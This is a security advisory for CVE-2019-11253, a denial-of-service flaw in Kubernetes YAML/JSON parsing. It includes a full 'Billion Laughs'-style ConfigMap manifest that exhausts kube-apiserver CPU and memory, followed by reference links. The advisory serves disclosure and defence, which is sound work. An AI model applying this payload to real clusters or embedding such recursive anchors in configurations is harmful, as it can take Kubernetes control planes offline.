GHSA-74fp-r6jw-h4mp: Kubernetes apimachinery packages vulnerable to unbounded recursion in JSON or YAML parsing
(updated )
CVE-2019-11253 is a denial of service vulnerability in the kube-apiserver, allowing authorized users sending malicious YAML or JSON payloads to cause kube-apiserver to consume excessive CPU or memory, potentially crashing and becoming unavailable.
When creating a ConfigMap object which has recursive references contained in it, excessive CPU usage can occur. This appears to be an instance of a “Billion Laughs” attack which is quite well known as an XML parsing issue.
Applying this manifest to a cluster causes the client to hang for some time with considerable CPU usage.
apiVersion: v1
data:
a: &a ["web","web","web","web","web","web","web","web","web"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
kind: ConfigMap
metadata:
name: yaml-bomb
namespace: default
References
- github.com/advisories/GHSA-74fp-r6jw-h4mp
- github.com/advisories/GHSA-pmqp-h87c-mr78
- github.com/kubernetes/kubernetes
- github.com/kubernetes/kubernetes/issues/83253
- github.com/kubernetes/kubernetes/pull/83261
- groups.google.com/g/kubernetes-security-announce/c/jk8polzSUxs
- nvd.nist.gov/vuln/detail/CVE-2019-11253
- pkg.go.dev/vuln/GO-2022-0965
- stackoverflow.com/questions/58129150/security-yaml-bomb-user-can-restart-kube-api-by-sending-configmap
Detect and mitigate GHSA-74fp-r6jw-h4mp with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →